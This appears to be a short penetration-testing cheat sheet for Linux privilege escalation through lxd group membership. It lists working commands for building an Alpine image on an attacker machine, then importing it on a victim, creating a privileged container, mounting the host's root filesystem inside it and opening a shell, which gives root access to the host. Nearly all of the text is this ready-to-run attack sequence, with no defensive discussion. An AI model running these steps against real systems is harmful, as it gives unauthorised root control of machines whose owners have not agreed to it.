If user is part of lxd group:

Being Members of lxd group can create privileged containers and mount the host’s root filesystem into them. From there, gaining root on the host becomes trivial.
---------------------------------

In Attacker Machine:

git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
sudo ./build-alpine




----------------------------------------------------------------------------------------------
In victim-machine:

lxc image import alpine-v3.13-x86_64-20210218_0139.tar.gz --alias myimage
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
